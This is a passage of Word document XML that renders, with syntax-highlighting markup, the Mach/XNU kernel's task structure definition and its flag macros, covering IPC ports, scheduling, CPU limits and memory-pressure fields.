        <w:t>vm_map_t    map</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ddress space description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queue_chain_t   task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global list of task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void</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user_data</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rbitrary data settable via IPC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defined</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CONFIG_SCHED_MULTIQ</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sched_group_t sched_group</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defined(CONFIG_SCHED_MULTIQ)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hreads in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queue_head_t        thread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processor_set_t     pset_hint</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affinity_space   </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>affinity_space</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thread_count</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active_thread_count</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suspend_coun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Internal scheduling only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User-visible scheduling information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user_stop_coun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outstanding stop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legacy_stop_coun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outstanding legacy stop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priority</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base priority for thread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max_priority</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maximum priority for thread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integer_t       importanc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riority offset (BSD 'nice' value)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security and audit token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security_token_t sec_token</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audit_token_t   audit_token</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tatistic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total_user_tim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erminated threads only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total_system_time</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Virtual timer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vtimer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IPC structure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decl_lck_mtx_data</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(,</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>itk_lock_data</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self</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not a right, doesn't hold ref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nself</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not a right, doesn't hold ref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sself</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send righ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exception_action exc_actions</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXC_TYPES_COUNT</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send right each valid elemen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hos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send righ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bootstrap</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send righ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seatbel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send righ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gssd</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yet another send righ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debug_control</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end right for debugmode communication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task_acces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nd another send right */</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resum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 receive right to resume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port </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>itk_registered</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TASK_PORT_REGISTER_MAX</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all send right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space </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>itk_space</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ynchronizer ownership information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queue_head_t    semaphore_lis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list of owned semaphore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semaphores_owned</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number of semaphores owned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ledger_t    ledger</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unsigned</w:t>
      </w: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priv_flag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rivilege resource flag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VM_BACKING_STORE_PRIV   </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x1</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MACHINE_TASK</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fault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faults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pagein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ageins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cow_fault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copy on write fault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messages_sen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messages sent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messages_received</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messages received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integer_t syscalls_mach</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mach system call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eger_t syscalls_unix</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unix system call counte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c_switch</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otal context switche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p_switch</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otal processor switche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ps_switch</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otal pset switche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zinfo_usage_t tkm_zinfo</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er-task, per-zone usage statistic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def</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  MACH_BSD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void</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bsd_info</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vm_shared_region     </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shared_region</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volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> uint32_t t_flag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general-purpose task flags protected by task_lock (TL)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64B_ADDR             </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000001</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has 64-bit addressing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64B_DATA             </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000002</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has 64-bit data register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CPUMON_WARNING       </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000004</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has at least one thread in CPU usage warning zon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WAKEMON_WARNING      </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000008</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is in wakeups monitor warning zon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TELEMETRY            </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TF_CPUMON_WARNING </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TF_WAKEMON_WARNING</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is a telemetry participan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F_GPU_DENIED           </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000010</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 is not allowed to access the GPU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ask_has_64BitAddr</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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">t_flags </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TF_64B_ADDR</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color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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lastRenderedPageBreak/>
        <w:t>#define</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> task_set_64BitAddr</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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">t_flags </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|=</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TF_64B_ADDR</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ask_clear_64BitAddr</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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">t_flags </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;=</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TF_64B_ADDR</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ask_has_64BitData</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w:t>
      </w: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task</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">t_flags </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TF_64B_DATA</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color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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mach_vm_address_t   all_image_info_addr</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dyld __all_image_info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mach_vm_size_t      all_image_info_siz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ection location and size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CONFIG_COUNTERS </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> KPERF</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ASK_PMC_FLAG           </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x1</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Bit in "t_chud" signifying PMC interest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define</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TASK_KPC_FORCED_ALL_CTRS    </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x2</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Bit in "t_chud" signifying KPC forced all counters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t_chud</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CHUD flags, used for Shar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pidsuspended</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id_suspend called; no threads can execut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frozen</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frozen; private resident pages committed to swap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changing_freeze_stat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in the process of freezing or thawing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16_t policy_ru_cpu          </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4</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policy_ru_cpu_ext      </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4</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applied_ru_cpu         </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4</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applied_ru_cpu_ext     </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4</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uint8_t  rusage_cpu_flag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8_t  rusage_cpu_percentag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wide CPU limit percentag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rusage_cpu_interval</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ask-wide CPU limit interval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8_t  rusage_cpu_perthr_percentag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er-thread CPU limit percentag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rusage_cpu_perthr_interval</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er-thread CPU limit interval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rusage_cpu_deadline</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thread_call_t rusage_cpu_callt</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CONFIG_ATM</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atm_task_descriptor </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atm_contex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ointer to per task atm descripto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CONFIG_BANK</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bank_task </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bank_contex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ointer to per task bank structur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IMPORTANCE_INHERITANCE</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ipc_importance_task  </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>task_imp_base</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Base of IPC importance chain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IMPORTANCE_INHERITANCE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vm_extmod_statistics_data_t extmod_statistic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MACH_ASSER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nt8_t      suspends_outstanding</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uspends this task performed in excess of resumes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task_requested_policy requested_policy</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task_effective_policy effective_policy</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task_pended_policy    pended_policy</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7195" w:rsidRPr="006F7195" w:rsidRDefault="006F7195" w:rsidP="006F7195">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     * Can be merged with imp_donor bits, once the IMPORTANCE_INHERITANCE macro goes away.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>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low_mem_notified_warn     </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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warning low memory notification is sent to the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low_mem_notified_critical </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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critical low memory notification is sent to the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purged_memory_warn        </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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urgeable memory of the task is purged for warning level pressur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purged_memory_critical    </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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purgeable memory of the task is purged for critical level pressur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mem_notify_reserved       </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>28</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reserved for future use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io_stat_info_t  task_io_stat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p>
    <w:p w:rsidR="006F7195" w:rsidRPr="006F7195" w:rsidRDefault="006F7195" w:rsidP="006F7195">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>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xml:space="preserve">/* </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7195" w:rsidRPr="006F7195" w:rsidRDefault="006F7195" w:rsidP="006F7195">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     * The cpu_time_qos_stats fields are protected by the task lock</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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struct</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> _cpu_time_qos_stats  cpu_time_qos_stat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Statistics accumulated for terminated threads from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32_t    task_timer_wakeups_bin_1</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    uint32_t    task_timer_wakeups_bin_2</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uint64_t    task_gpu_n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 of purgeable volatile VM objects owned by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task_volatile_object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 of purgeable but not volatile VM objects owned by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int</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     task_nonvolatile_objects</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task_purgeable_disowning</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boolean_t   task_purgeable_disowned</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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Coalition is set in task_create_internal and unset in task_deallocate_internal, so it can be referenced without the task loc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coalition_t coalition</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coalition this task belongs to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These fields are protected by coalition-&gt;lock, not the task loc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queue_chain_t   coalition_tasks</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list of tasks in the coalition */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7195" w:rsidRPr="006F7195" w:rsidRDefault="006F7195" w:rsidP="006F7195">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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if</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> HYPERVISOR</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="006F7195">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
